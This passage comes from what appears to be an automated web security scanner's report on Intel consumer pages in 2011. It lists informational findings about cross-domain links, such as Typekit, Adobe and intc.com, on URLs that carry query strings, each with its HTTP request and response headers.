           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.64. http://www.intel.com/consumer/game/mobile/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/game/mobile/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/game/mobile/index.htm?iid=subhdr+game_mobile
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/game/mobile/index.htm?iid=subhdr+game_mobile HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:01 GMT
Content-Length: 31294
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.65. http://www.intel.com/consumer/game/teams/events.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/game/teams/events.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/game/teams/events.htm?iid=subhdr+game_teams
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/game/teams/events.htm?iid=subhdr+game_teams HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:05 GMT
Content-Length: 19243
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
   <head>
       <meta na
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.66. http://www.intel.com/consumer/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/index.htm?iid=gg_play-en_US+home_consumer
The response contains the following links to other domains:
  • http://www.adobe.com/go/getflashplayer
  • http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/index.htm?iid=gg_play-en_US+home_consumer HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947554733; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3Aen_us/business; s_sq=%5B%5BB%5D%5D; intelresearchSTGref=NONE; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:09 GMT
Connection: close
Content-Length: 30374


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
<br />
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/>
</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.67. http://www.intel.com/consumer/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/?iid=gg_play+products
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/?iid=gg_play+products HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33897


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.68. http://www.intel.com/consumer/products/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/index.htm?iid=gg_play+products
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/index.htm?iid=gg_play+products HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33897


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.69. http://www.intel.com/consumer/products/processors/chipset.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/chipset.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/processors/chipset.htm?iid=en_US_01_chipset+gg_headline
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/processors/chipset.htm?iid=en_US_01_chipset+gg_headline HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:56 GMT
Content-Length: 30536
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.70. http://www.intel.com/consumer/products/processors/comparison.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/comparison.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/processors/comparison.htm?iid=gg_play+products_processors
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/processors/comparison.htm?iid=gg_play+products_processors HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:56 GMT
Content-Length: 19808
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
   <head>
       <meta na
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.71. http://www.intel.com/consumer/products/processors/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/processors/index.htm?iid=subhdr+products_proc
The response contains the following links to other domains:
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/processors/index.htm?iid=subhdr+products_proc HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38943


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...
</script><script type="text/javascript" src="http://use.typekit.com/yhr6rfe.js"></script>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.72. http://www.intel.com/consumer/products/processors/ratings.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /consumer/products/processors/ratings.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/consumer/products/processors/ratings.htm?iid=gg_play+products_processors_ratings
The response contains the following links to other domains:
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/themes/start/jquery-ui.css
  • http://use.typekit.com/yhr6rfe.js
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /consumer/products/processors/ratings.htm?iid=gg_play+products_processors_ratings HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; 